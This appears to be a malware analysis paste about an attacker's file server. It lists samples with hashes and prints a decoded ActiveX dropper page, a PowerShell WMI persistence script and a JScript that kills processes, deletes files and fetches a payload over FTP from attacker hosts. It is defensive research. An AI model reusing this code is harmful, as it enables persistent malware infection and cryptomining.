List all files: http://dwn.rundll32.ml:88/?tpl=list&folders-filter=&recursive

1. List all files:
2. http://dwn.rundll32.ml:88/?tpl=list&folders-filter=&recursive
3.  
4. Download all files in tarball:
5. http://dwn.rundll32.ml:88/?mode=archive&recursive
6.  
7. Filelist:
8. 3.zip Password protected zip, John doesn't help
9. 321.exe 6bbf24496ba12ae8f636a926090ccfee (43/67) Miner
10. 32ja.exe 00bca411dca23f4588c92f71e3eb439b (51/68) Doublepulsar
11. 32k.exe 7af20530a799302b069d2d44e9d879d4 (0/0) Unknown file
12. 33.zip Password protected zip, John doesn't help
13. 64.exe 1c72566993cdc1aeeae1b9730f70d805 (34/67) BitMiner?
14. 64ja.exe a7df6218c11c5010016138c31d7b51b1 (47/68) Doublepulsar
15. 64k.exe 67a0c1945293c2223496a105b95429ac (0/0) Unknown file
16. a.exe c2e33815dadae01d21b2367b5d061ff6 (37/68) BitMiner?
17. DownloaderActiveX.cab 8fd32442a54c1e5f71345b037f03365a (33/57) Downloader
18. ie.swf 79983f8e633cba9af29ef4d8850ff887 (0/0) Unknown
19. java.exe c9185ef6f065dfd97d17933d67ef6eac (52/67) Gamethief Magania
20. kill.html See below
21. map.htm See below
22. mof.ps1 See below
23. mof.txt See below
24. n.exe 6ba244dd937bc848864583b5d38c8c2c (0/0) Unknown
25. pgmysql 320399ae49e97e5368de08b777332e5f (0/0) Unknown ELF file
26. we32.exe 6bbf24496ba12ae8f636a926090ccfee Same as 321.exe
27. we64.exe 1c72566993cdc1aeeae1b9730f70d805 Same as 64.exe
28.  
29. ---
30. kill.html contents:
31. rundll32.exe C:\*.exe 0
32. ntvdm.exe c:\*.exe 0
33. lsmo1.exe c:\windows\help\lsmox.exe 0
34. taskmgr.exe c:\windows\ntuhost.exe 0
35. lsmosee1.exe c:\windows\debug\lsmoseex.exe 0
36. lsmose1.exe c:\windows\debug\0621.exe 0
37. wowsiu.exe c:\windows\wowsiu.exe 0
38. Tnteime.exe c:\windows\fonts\Tnteime.exe 0
39. rmfxys.exe c:\windows\rmfxys.exe 0
40. hz64.exe C:\Windows\debug\hzwk\hz64.exe 0
41. gymaye.exe c:\windows\gymaye.exe 0
42. NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0
43. mscorsvw.exe c:\windows\debug\wk\mscorsvw.exe 0
44. mssecsvc.exe c:\windows\mssecsvc.exe 0
45. lsmosee.exe c:\windows\help\lsmosee.exe 0
46. lsmose.exe c:\windows\debug\lsmose.exe 0
47. w1ninit.exe c:\programdata\microsoft\dhcq\w1ninit.exe 0
48. winin1t.exe c:\programdata\microsoft\dhcq\winin1t.exe 0
49. Mining.exe %ProgramFiles%\mining.exe 0
50.  
51. ---
52. map.htm contents:
53. Encoded javascript, decodes to:
54. <script src=hxxp://cs[.]cskick[.]cn/cs/c.js></script></html></script></body><BODY><OBJECT ID=\"DownloaderActiveX1\" WIDTH=\"0\" HEIGHT=\"0\" CLASSID=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" CODEBASE=\"DownloaderActiveX.cab#Version=1,0,0,1\"><PARAM NAME=\"propProgressbackground\" VALUE=\"#bccee8\"><PARAM NAME=\"propTextbackground\" VALUE=\"#f7f8fc\"><PARAM NAME=\"propBarColor\" VALUE=\"#df0203\"><PARAM NAME=\"propTextColor\" VALUE=\"#000000\"><PARAM NAME=\"propWidth\" VALUE=\"0\"><PARAM NAME=\"propHeight\" VALUE=\"0\"><PARAM NAME=\"propDownloadUrl\" VALUE=\"hxxp://windows[.]rundll32[.]ml:88/java.exe\"><PARAM NAME=\"propPostdownloadAction\" VALUE=\"run\"><PARAM NAME=\"propInstallCompleteUrl\" VALUE=\"\"><PARAM NAME=\"propbrowserRedirectUrl\" VALUE=\"\"><PARAM NAME=\"propVerbose\" VALUE=\"0\"><PARAM NAME=\"propInterrupt\" VALUE=\"0\"></OBJECT></script></body></html>
55.  
56. Note: hxxp://cs[.]cskick[.]cn is currently down
57.  
58. ---
59. mof.ps1 contents:
60. $filterName = 'filtP1'
61. $consumerName = 'consP1'
62. $Command ="GetObject(""script:hxxp://windows[.]rundll32[.]tk:88/mof.txt"")"
63.  
64. $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance Isa 'Win32_LocalTime' And TargetInstance.Minute = 30 And TargetInstance.Second =30"
65.  
66. $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
67.  
68. $WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command}
69.  
70. Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
71.  
72. Note: hxxp://windows[.]rundll32[.]tk:88 seems to be older address that is currently unavailable
73.  
74. ---
75. mof.txt contents:
76. <?xml version="1.0"?>
77.  
78. <package>
79. <component id="testCalc">
80.  
81. <script language="JScript">
82. <![CDATA[
83. var toff = 3000;
84. var url1 = "hxxp://windows[.]rundll32[.]tk:88/kill.html";
85. http = new ActiveXObject("Msxml2.serverXMLHTTP");
86. fso = new ActiveXObject("Scripting.FilesystemObject");
87. wsh = new ActiveXObject("WScript.Shell");
88. http.open("GET",url1, false);
89. http.send();
90. str = http.responseText;
91. arr = str.split("\r\n");
92. for (i = 0; i < arr.length; i++) {
93. t = arr[i].split(" ");
94. proc = t[0];
95. path = t[1];
96. dele = t[2];
97. wsh.Run("taskkill /f /im " + proc, 0, true);
98. if (dele == 0) {
99. try {
100. fso.DeleteFile(path, true);
101. } catch (e) {}
102. }
103. };
104. var t;
105. var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
106. wsh1 = new ActiveXObject("WScript.Shell");
107. var service = locator.ConnectServer(".");
108. var properties = service.ExecQuery("SELECT * FROM Win32_Process");
109. var np = new Enumerator (properties);
110. for (;!np.atEnd();np.moveNext())
111. {
112. t=t + np.item().Name + "\n";
113. }
114.  
115. if(t.indexOf("ieplare.exe") > -1){
116.  
117. }else{
118.  
119. wsh1.Run("cmd /c echo open ftp[.]rundll32[.]tk 25>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\\windows\\ieplare.exe>>ps&echo get c.rar c:\\windows\\config.json>>ps&echo bye>>ps&ftp -s:ps&del ps&start c:\\windows\\ieplare.exe");
120. }
121. ]]>
122. </script>
123.  
124. </component>
125. </package>
126.  
127. Note: test:1433@ftp.rundll32.tk:25 is currently down